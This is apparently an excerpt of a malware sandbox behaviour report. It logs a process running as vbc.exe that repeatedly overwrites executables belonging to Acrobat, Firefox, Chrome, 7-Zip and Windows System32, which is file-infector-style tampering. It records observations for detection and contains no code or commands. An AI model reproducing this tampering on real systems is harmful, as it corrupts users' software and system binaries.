                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe (1 write event)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe (14 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe (11 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe (8 write events)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\vds.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\alg.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
